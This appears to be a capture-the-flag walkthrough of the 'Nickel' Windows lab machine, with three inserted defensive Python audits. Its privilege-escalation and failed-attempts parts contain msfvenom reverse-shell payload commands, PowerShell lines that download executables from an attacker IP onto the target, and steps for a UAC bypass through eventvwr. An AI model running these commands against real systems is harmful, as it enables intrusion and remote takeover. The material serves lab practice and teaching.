36. Nickel (GET TO WORK) - Windows (pdfcrack, ssh-port-forward, scp file transfer)
1. Enumeration
: Port Scan
![](https://blog.kakaocdn.net/dn/brbQG6/btrK1pPlR5Y/1x7Q2SW8xGSDh3uZkWwjFk/img.png)
> domain name : nickel
: web enum
![](https://blog.kakaocdn.net/dn/cmrENw/btrK6PL19hc/oBP63AaVnBH3WTI8aw5SIK/img.png)
> The menu items do not respond, but inspecting the response packet shows
![](https://blog.kakaocdn.net/dn/bezzYw/btrK5awzVFb/AmM3XOlDEkkIs2GdOAR7PK/img.png)
> the request going to port 33333
: Checking port 33333
![](https://blog.kakaocdn.net/dn/DYMRt/btrK5awzVH3/CUWPCfG1kjdwVSXaKCEkE1/img.png)
![](https://blog.kakaocdn.net/dn/bYVXrt/btrK6QYsVjV/X7hFOdL5xeGIzoS5KxGkN1/img.png)
> The GET method is not accepted
2. Exploitation
> Trying the request with the POST method instead
![](https://blog.kakaocdn.net/dn/qkIfY/btrK6cgoigw/6AQkHCKk3K1a1mSMzTCKKK/img.png)
> The call succeeds; the System Idle Process is visible and user information is exposed
![](https://blog.kakaocdn.net/dn/cFQhts/btrK2nqcnnw/BFWb3DjKrWae5T5a2RC6u0/img.png)
> Login is not possible with this information as-is
: Trying a base64 decode
![](https://blog.kakaocdn.net/dn/di1LSQ/btrK4C1vkDA/8SKYq49HxmM1dW7ATe7Ly1/img.png)
> Password found!
: Attempting to log in
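The step above (a value that does not work as a credential until it is base64-decoded) is a classic case of an application leaking an encoded secret and treating encoding as protection. The following scanner is an added example, not code from the original post or from the Nickel machine: it scans a text body for base64 tokens that decode to printable text with several character classes, which is how a defender can catch such leaks in API responses, config files or logs before they ship. The sample body, the user name and both encoded values are constructed here for the demonstration.

```python
import base64
import re
import string

# Candidate base64 tokens: long runs of the alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _char_classes(text: str) -> int:
    """Count how many of lower/upper/digit/punctuation classes `text` uses."""
    return sum(
        any(c in cls for c in text)
        for cls in (string.ascii_lowercase, string.ascii_uppercase,
                    string.digits, string.punctuation)
    )


def find_encoded_secrets(body: str, min_classes: int = 3):
    """Return (token, decoded, classes) for each base64 token in `body` that
    decodes to printable ASCII mixing at least `min_classes` character classes.
    Binary blobs and low-entropy words (e.g. "hello world") are skipped."""
    findings = []
    for match in B64_TOKEN.finditer(body):
        token = match.group(0)
        if len(token) % 4:          # base64 output is always a multiple of 4
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue                # not valid base64, or not text at all
        if not all(c in string.printable for c in decoded):
            continue
        classes = _char_classes(decoded)
        if classes >= min_classes:
            findings.append((token, decoded, classes))
    return findings


# Constructed sample (hypothetical response body, not from the real target):
# a session id and a password are base64-encoded among harmless values.
SESSION_ID = "fake-session-id-12345"
PASSWORD = "MySuperSecretP!ssw0rd"
SAMPLE_BODY = (
    "user=ariah\n"
    "session=" + base64.b64encode(SESSION_ID.encode()).decode() + "\n"
    "note=aGVsbG8gd29ybGQ=\n"                # "hello world": printable but bland
    "hint=" + base64.b64encode(PASSWORD.encode()).decode() + "\n"
    "binary=/9j/4AAQSkZJRgABAQ==\n"          # JPEG header bytes, not text
)

if __name__ == "__main__":
    for token, decoded, classes in find_encoded_secrets(SAMPLE_BODY):
        print(f"{token} -> {decoded!r} ({classes} character classes)")
```

The character-class threshold is a cheap heuristic: it keeps the two credential-like values and drops the JPEG fragment and the plain English phrase. Raising `min_classes` to 4 leaves only the password-style value.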
![](https://blog.kakaocdn.net/dn/7pfcS/btrK5FpBU66/ZrWS6JtNR0OAxhEzyYA7ok/img.png)
Foothold obtained!
3. Privilege Escalation
: Directory searching
![](https://blog.kakaocdn.net/dn/brBAGF/btrLaV7drXP/aYI5yYhL27CVQp4qTyABlk/img.png)
> A PDF file is found
> Download the PDF
Method 1) ftp
ftp> bin
ftp> get Infrastructure.pdf
or
ftp> bin
ftp> recv Infrastructure.pdf
![](https://blog.kakaocdn.net/dn/bmjY82/btrLa4bU6hi/kTOhsJDNm747m5kR6vd1Qk/img.png)
Method 2) scp
# scp ariah@192.168.120.209:C:\\users\\ariah\\desktop\\payload.exe /root/PG/20
![](https://blog.kakaocdn.net/dn/cEzr55/btrLcJZgg3n/7xZog3YySb18Kp2gof18E1/img.png)
![](https://blog.kakaocdn.net/dn/cOYmX5/btrLb5hbamu/vbXd51i3f7lGMFWTFCVL00/img.png)
> Opening the file after fetching it with scp
![](https://blog.kakaocdn.net/dn/pjMp2/btrK9yyhFLM/C2EOO6nqyzOcFB9S1NJCdK/img.png)
> A password is required
: Cracking the PDF (pdfcrack)
![](https://blog.kakaocdn.net/dn/cG12XG/btrLcIlLtKW/YJWXEyLMtPuuuDpOts6CxK/img.png)
![](https://blog.kakaocdn.net/dn/blA6In/btrLalrG0mb/0kA8LjopRzfTxgCxq31ml0/img.png)
> Password found
: Reading the PDF contents
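The PDF password fell to pdfcrack above, which is worth a defender's check: a document's protection is only as strong as its user password, and documents still using the original 40-bit RC4 handler can be exhausted without guessing any password at all. The audit below is an added example, not part of the original post or of pdfcrack: it reads the standard security handler parameters (`/V`, `/R`, `/Length`) straight out of the file and classifies them. The three sample documents are constructed byte strings with just enough structure for the audit, not real PDFs.

```python
import re

# "N G obj ... endobj" bodies; non-greedy so each object is captured separately.
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)


def _int_param(body: bytes, name: bytes, default: int) -> int:
    """Read an integer entry such as /V 2 from a dictionary body."""
    m = re.search(rb"/" + name + rb"\s+(-?\d+)", body)
    return int(m.group(1)) if m else default


def classify(v: int, r: int, length: int):
    """Map standard security handler /V, /R, /Length to (algorithm, key bits)."""
    if v == 1 or r == 2:
        return "RC4", 40                 # PDF 1.1-1.3: 40-bit key, exhaustible directly
    if v == 2 and r == 3:
        return "RC4", length             # PDF 1.4: 40..128-bit key
    if v == 4:
        return "AES-128 or RC4-128 (crypt filter)", 128
    if v == 5 and r == 5:
        return "AES-256 (interim R5 scheme)", 256
    if v == 5 and r == 6:
        return "AES-256", 256
    return "unknown", length


def audit_pdf_encryption(data: bytes) -> dict:
    """Report whether `data` is encrypted with the standard handler and how.
    'weak' marks a 40-bit key, which cracking tools can exhaust without
    guessing the password; anything else is only as strong as the password."""
    if not re.search(rb"/Encrypt\b", data):
        return {"encrypted": False}
    for _num, body in OBJ_RE.findall(data):
        if not re.search(rb"/Filter\s*/Standard\b", body):
            continue
        v = _int_param(body, b"V", 0)
        r = _int_param(body, b"R", 2)
        length = _int_param(body, b"Length", 40)
        algorithm, bits = classify(v, r, length)
        return {"encrypted": True, "revision": r, "algorithm": algorithm,
                "key_bits": bits, "weak": bits <= 40}
    return {"encrypted": True, "algorithm": "non-standard security handler"}


# Constructed samples (not real documents): just enough structure for the audit.
WEAK_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"5 0 obj << /Filter /Standard /V 1 /R 2 /Length 40 /P -1 /O <00> /U <00> >> endobj\n"
    b"trailer << /Root 1 0 R /Encrypt 5 0 R /ID [<00> <00>] >>\n%%EOF\n"
)
STRONG_PDF = WEAK_PDF.replace(b"/V 1 /R 2 /Length 40", b"/V 5 /R 6 /Length 256")
PLAIN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_PDF), ("strong", STRONG_PDF), ("plain", PLAIN_PDF)):
        print(name, audit_pdf_encryption(doc))
```

For a real file, read it as bytes and pass it in; the parser only needs the trailer's `/Encrypt` reference and the handler dictionary, so it works on compressed documents too as long as the encryption dictionary itself is not inside an object stream.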
![](https://blog.kakaocdn.net/dn/rLc9a/btrK91mP4xV/VdDKlKxh5k1XF7jvW8rGsK/img.png)
> A temporary command endpoint is documented
> Port 80 did not appear in the port scan
: Checking active network listeners
![](https://blog.kakaocdn.net/dn/E7RFQ/btrLa3KPMP1/lKkratzsS76HgakLW4NEX1/img.png)
> Port 80 is listening
: SSH port forwarding
![](https://blog.kakaocdn.net/dn/bhqccZ/btrLchojPqa/acakOaluODGvDN0ayNCIok/img.png)
> Connecting to local port 7979 reaches port 80 on the target
: Running a command through the forwarded port
![](https://blog.kakaocdn.net/dn/bBJBOg/btrLaC02BfP/IKJKxsl653BW1kpfn3JEYk/img.png)
> It works (commands run as SYSTEM); it also works directly on the local host without port forwarding
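The port-80 service above was invisible from the network because it only listened locally, yet an SSH local forward (`-L 7979` to the target's 80) reached it anyway: binding to localhost is not access control once a user has an SSH shell, and OpenSSH allows TCP forwarding by default. The audit below is an added example, not code from the post or from OpenSSH: it parses an `sshd_config` and flags forwarding settings that undo a localhost-only binding, showing the permissive default beside a hardened variant. Both configurations are constructed samples, and the group name `tunnel-admins` is hypothetical.

```python
import re

# Constructed samples (hypothetical, not the target's real sshd_config).
# OpenSSH default: AllowTcpForwarding yes, so any authenticated user can
# reach a service bound to 127.0.0.1 on the server with `ssh -L`.
WEAK_CONFIG = """
Port 22
PasswordAuthentication yes
AllowTcpForwarding yes
GatewayPorts no
"""

# Forwarding off globally, re-enabled only for one group and only to one
# destination. Everything after a Match line belongs to that block, so
# Match blocks go at the end of the file.
HARDENED_CONFIG = """
Port 22
PasswordAuthentication no
AllowTcpForwarding no
GatewayPorts no
Match Group tunnel-admins
    AllowTcpForwarding local
    PermitOpen 127.0.0.1:443
"""


def parse_sshd_config(text: str):
    """Return (global_settings, [(match_criteria, settings), ...]).
    Keywords are case-insensitive; the first occurrence of a keyword wins,
    as in sshd itself. Comments and blank lines are ignored."""
    global_settings, match_blocks = {}, []
    current = global_settings
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        current.setdefault(key, value)
    return global_settings, match_blocks


def audit_forwarding(text: str) -> list:
    """List forwarding-related weaknesses in an sshd_config."""
    settings, match_blocks = parse_sshd_config(text)
    findings = []
    if settings.get("allowtcpforwarding", "yes").lower() != "no":
        findings.append("global AllowTcpForwarding is not 'no' (default yes): "
                        "any shell user can tunnel to localhost-only services")
    if settings.get("gatewayports", "no").lower() != "no":
        findings.append("GatewayPorts exposes remote forwards to other hosts")
    for criteria, block in match_blocks:
        if block.get("allowtcpforwarding", "no").lower() != "no" and "permitopen" not in block:
            findings.append(f"Match {criteria}: forwarding enabled without a PermitOpen limit")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_forwarding(cfg) or "no findings")
```

Disabling forwarding only narrows the path; a user with a shell can still run a relay process of their own, so the real fix for an admin endpoint like the one above is authentication on the service itself rather than reliance on where it listens.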
![](https://blog.kakaocdn.net/dn/RGGyh/btrLcI68LEu/QpTMI7UVIZH1z1AJ8kZcO0/img.png)
: Reverse shell
![](https://blog.kakaocdn.net/dn/c4F8jk/btrK9zcVh3Y/0A7rOTEDwhLqkLWkjCmkUk/img.png)
> Commands must be URL-encoded
![](https://blog.kakaocdn.net/dn/nrk2e/btrLcIlLtGX/RGiEmkeZ8LePSqWFNxRGTk/img.png)
> After starting the listener, run the file
(reverse shell generation is recorded in the failed attempts below)
![](https://blog.kakaocdn.net/dn/N6ehI/btrLaVGaWmt/42b8WfJa21dkqnkBRBd78K/img.png)
![](https://blog.kakaocdn.net/dn/ce883g/btrLauB3sUe/93E5mQOv7UsKBxhOj4JAX1/img.png)
Done
- Failed attempts -
: Checking privileges
![](https://blog.kakaocdn.net/dn/cdqC2C/btrK3WMEl2e/aRb4sFD9KC0rZFtzHKdGC0/img.png)
> SeChangeNotifyPrivilege Enable
: PsExec.exe + reverse.exe + Strings64.exe + eventvwr.exe + exploit
1) Generate the reverse shell payload and test it
: Generation
#x86
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.148 LPORT=443 --format exe -o reverse.exe
#x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.148 LPORT=443 --format exe -o reverse.exe
![](https://blog.kakaocdn.net/dn/mLbG7/btrK6dfiwb7/3uoSDcFBfhNphkEnAxcsZK/img.png)
: Test
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/reverse.exe', 'c:\Users\ariah\reverse.exe');
![](https://blog.kakaocdn.net/dn/cMzTMd/btrK4TWc1Ph/bkHSeGUcbKT8honZ6tytqK/img.png)
![](https://blog.kakaocdn.net/dn/bX33ME/btrK48ljhne/VvdWZyQd0VKtcEZWSCgTD1/img.png)
2) Download the remaining files :
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/PsExec.exe', 'c:\Users\ariah\ps.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/strings64.exe', 'c:\Users\ariah\str64.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/eventvwr.exe', 'c:\Users\ariah\event.exe');
: PsExec test
![](https://blog.kakaocdn.net/dn/cszKbW/btrK1iJsGz3/fynF7SW8tRwfQYkiTn3KWK/img.png)
> access is denied.
3) Strings64 command :
str64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
<autoElevate>true</autoElevate> confirmed
![](https://blog.kakaocdn.net/dn/czu8zN/btrK4V7xdoM/PvnnIMavrFlsk1dYrlcOwK/img.png)
4) Exploits download :
https://github.com/turbo/zero2hero/blob/master/main.c
> Uncomment and change the payload filename
![](https://blog.kakaocdn.net/dn/B5k9i/btrK1h4SLVA/z3d2nT0jkvi0T2JvrCNZQk/img.png)
5) Compile the exploits :
x86_64-w64-mingw32-gcc main.c -o eventvwr_bypass_64.exe
![](https://blog.kakaocdn.net/dn/kJ61f/btrK4WZI2N7/MIA1gQuaJTdvmZHMpJPIAK/img.png)
6) File download :
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/eventvwr_bypass_64.exe', 'c:\Users\ariah\eventvwr.exe');
![](https://blog.kakaocdn.net/dn/2rm1q/btrK48FCxdi/nzTQhmfBtVcVh28Ao6KN5K/img.png)
7) Execute new eventvwr.exe
: Does not run - failed
8) Check privileges after obtaining the new shell
: Failed
9) Re-run PsExec.exe :
: Naturally does not work either
- End of failed attempts -